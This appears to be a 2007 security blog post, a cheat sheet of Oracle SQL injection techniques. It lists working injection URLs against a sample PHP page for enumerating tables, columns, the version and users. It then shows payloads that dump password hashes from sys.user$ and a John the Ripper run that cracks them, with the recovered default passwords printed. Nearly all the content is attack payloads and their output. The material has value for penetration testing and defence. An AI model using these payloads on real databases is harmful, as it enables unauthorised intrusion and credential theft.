SQL Injection In Oracle

Posted: Wed, 11/07/2007 - 08:37

1. Finding table names

select table_name from+user_tables

Example:-

192.168.2.199/ora.php?id=101+union+all+select+

table_name+from+user_tables

Blind Injection:192.168.2.199/ora.php?id=101 and

ascii(substr((select+table_name+from+user_tables

where rownum=1),1,1))>100

-----------------------------------------------

2. Iterating through the different rows:

Unfortunately it is not as straight forward, there is no LIMIT command in oracle.

Syntax:-select column_1, column_2 from (select rownum r_, column_1,

column_2  from table_1, table_2  where field_3 =

'some value')where r_ =2

EXAMPLE:-

192.168.2.199/ora.php?id=101+UNION+ALL+SELECT+TABLE_NAME

+FROM+(SELECT+ROWNUM+R,+TABLE_NAME+FROM

+USER_TABLES)+WHERE+R=1

--------------------------------------------------------------------------

3. Finding column names:

select+column_name+from+user_tab_columns

--------------------------------------------------------------------------

4. Finding Version:

Select banner from v$version

-----------------------------------------------------------------------

5. Finding Database user names:-

192.168.2.199/ora.php?id=101+union+

all+select+username,null+from+all_users

---------------------------------------------------------------------

6. Finding password  hashes (the user in connection string should be a dba):

select name,astatus, password from sys.user$ where astatus =0;

<# a status =0 indicates only the users who are not locked)

example:-192.168.2.199/ora.php?id=101+union

+all+select+name||'--'||password+from+sys.user$

In the above example: i had only one column to select a string from database, so i had concatenated the

username and password field together separated with '--'.

----------------------------------------------------------------------------

7. Cracking passwords using john the ripper:-

thanks to pentestmonkey for this

$ ./john --rules --wordlist=/home/sid/tools/dictionaries/MAIN-ONE-unix.txt--format=oracle ~/opass

Loaded 14 password hashes with 14 different salts (Oracle [oracle])DIP              (DIP)ORACLE           (FLOWS_020100)ORACLE           (FLOWS_FILES)ORACLE           (XDB)ORACLE           (CTXSYS)PASSWORD         (HR)PASSWORD         (SYSTEM)PASSWORD         (SYS)TEST             (TEST2)TEST1            (TEST1)
------------------------------------------------------------------------------
what else you want from a SQL Injection Furious

SQL Injection In Ingres

SQL Injection In DB2

Speak to our experts about your needs today